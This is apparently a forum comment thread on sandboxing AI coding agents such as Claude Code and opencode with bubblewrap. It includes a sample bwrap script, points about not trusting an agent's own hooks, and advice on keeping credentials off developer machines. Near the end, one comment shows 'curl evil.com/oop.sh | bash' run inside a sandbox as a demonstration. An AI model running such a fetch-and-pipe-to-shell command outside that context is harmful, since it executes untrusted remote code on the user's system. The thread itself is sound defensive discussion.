They are giving users a convenience function for restricting the Claude instance’s access rights from within a session.

Thats helpful if you trust the client, but what if there is a bug in how the client invokes the bubblewrap container? You wouldn’t have this risk if they drove you to invoke Claude with bubblewrap.

Additionally, the pattern using bubblewrap in front of Claude can be exactly duplicated and applied to other coding agents- so you get consistency in access controls for all agents.

gausswho5mo ago· 1 in thread

I'm having trouble finding the right incantations to bubblewrap opencode when in a silverblue toolbox. It can't use tools. Anyone have tips?

l725mo ago

This is what I have been using with opencode:

  exec bwrap \
    --unshare-pid \
    --unshare-ipc \
    --unshare-uts \
    --share-net \
    --bind "$OPENCODE_ROOT" "$OPENCODE_ROOT" \
    --bind "$CURRENT_DIR" "$CURRENT_DIR" \
    --bind "$HOME/.config/opencode/" "$HOME/.config/opencode/" \
    --bind "$HOME/.emacs" "$HOME/.emacs" \
    --bind "$HOME/.emacs.d" "$HOME/.emacs.d" \
    --ro-bind "$HOME/.gitconfig" "$HOME/.gitconfig" \
    --ro-bind /bin /bin \
    --ro-bind /etc /etc \
    --ro-bind /lib /lib \
    --ro-bind /lib64 /lib64 \
    --ro-bind /usr /usr \
    --bind /run/systemd /run/systemd \
    --tmpfs /tmp \
    --proc /proc \
    --dev /dev \
    --setenv EDITOR emacs \
    --setenv PATH "$OPENCODE_BINDIR:/usr/bin:/bin" \
    --setenv HOME "$HOME" \
    -- \
    "opencode" "$@"

arresin5mo ago· 1 in thread

Why not just use a hook on reads?

0o_MrPatrick_o0OP5mo ago

because you're trusting Claude's implementation of hooks, which may be disastrous if they have a defect.

flakes5mo ago

With the unpack directory, you can now limit the host paths you expose, avoiding leaking in details from your host machine into the sandbox.

bwrap --ro-bind image/ / --bind src/ /src ...

Any tools you need in the container are installed in the image you unpack.

brendoncarroll5mo ago

[0] https://github.com/brendoncarroll/nnc

Gerharddc5mo ago

OutOfHere5mo ago

The link you need is https://github.com/containers/bubblewrap

Don't leave prod secrets in your dev env.

coppsilgold5mo ago

raw_anon_11115mo ago

My workflow even before Claude code.

1. I never use permanent credentials for AWS on my local computer.

2. I never have keys anywhere on my local computer. I put them in AWS Secret Manager.

3. My usual set of local access keys can’t create IAM roles (PowerUserAccess).

It’s not foolproof. But it does reduce the attack surface.

eyberg5mo ago

https://github.com/containers/bubblewrap/issues/142

ironbound5mo ago

https://www.wired.com/story/anthropic-claude-snitch-emergent...

majorchord5mo ago

Nora235mo ago

Smart approach to AI agent security. The balance between convenience and protection is tricky.

mijoharas5mo ago

How would people compare bubblewrap to firejail? They seem reasonably similar in feature set.

Are there any good reasons to pick one over the other?

dlahoda5mo ago

sydbox is intresting alternative (written in rust by linux developer)

https://gitlab.exherbo.org/sydbox/sydbox

UPDATE: there is other sydbox written in go, not related and seems different too far from bwrap

isodev5mo ago

FergusArgyll5mo ago

Hey! I just did this last night!

allen-munsch5mo ago

I vibed a project on this recently, it has some language bindings and a cli written in rust, python subprocess monkey patching etc.

Just no nonsense defaults with a bit of customization.

https://github.com/allen-munsch/bubbleproc

bubbleproc -- curl evil.com/oop.sh | bash

catlifeonmars5mo ago

May I suggest rm -f .env? Or chmod 0600 .env? You’re not running CC as your own user, right? …Right?

Oh, never mind:

> You want to run a binary that will execute under your account’s permissions

j / k navigate · click thread line to collapse